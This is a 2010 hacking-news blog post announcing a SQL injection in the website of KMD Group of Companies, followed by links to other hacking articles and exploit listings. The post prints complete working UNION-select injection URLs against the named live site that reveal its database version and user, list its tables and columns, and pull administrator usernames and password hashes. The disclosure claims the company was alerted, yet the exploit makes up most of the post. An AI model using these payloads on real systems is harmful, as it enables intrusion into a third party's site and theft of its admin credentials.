Critical SQL Injection in www.kmd.com KMD Group of Companies

Home / Hacking, News, Security / Critical SQL Injection in www.kmd.com KMD Group of Companies

August 26, 2010 PlanetCreator 0 Comments 0 tags

PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.kmd.com.sg owned by KMD Group of Companies

These are some information from Vulneral Site http://www.kmd.com.sg :

his vulnerability has been alerted to :- [email protected]

@@version, user(), DB

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,5,6,7,8--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

tbl

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

col

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28column_name%29,5,6,7,8%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

usr & pass hash

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28adm_user_name,0x3a,adm_user_password%29,5,6,7,8%20from%20kmd_admuser--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

We hope that your security staff will look into this issue and fix it as soon as possible.

Thx – Infofreakzzz for sending security updates!

Explore More

XSS: Types and Uses

We all know that XSS is the most common exploit to be found in any website. However, different forms of XSS have different uses, as i will cover in this

Cyber attacks are real but is there any foolproof defense yet?

Tulip Systems Inc., the world renowned high bandwidth and broadcast stream hosting service US corporation was under repeated cyber attacks aimed at disrupting web services during the Georgia-Russia standoff few

Hacking a Windows 2000 system through IPC$

1: Scanning for open Win2k systems2: Connecting to the IPC$3: Connecting and using Computer Management.4. Disable NTLM5: Starting the Telnet service6: Creating user accounts and adding them to a group7:

[remote] HTTP/2 2.0 - Denial Of Service (DOS)
on September 16, 2025 at 12:00 am
HTTP/2 2.0 - Denial Of Service (DOS)
[webapps] Concrete CMS 9.4.3 - Stored XSS
on September 16, 2025 at 12:00 am
Concrete CMS 9.4.3 - Stored XSS
[local] Mbed TLS 3.6.4 - Use-After-Free
on September 16, 2025 at 12:00 am
Mbed TLS 3.6.4 - Use-After-Free
[webapps] ELEX WooCommerce WordPress Plugin 1.4.3 - SQL Injection
on September 16, 2025 at 12:00 am
ELEX WooCommerce WordPress Plugin 1.4.3 - SQL Injection
[webapps] XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)
on September 16, 2025 at 12:00 am
XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)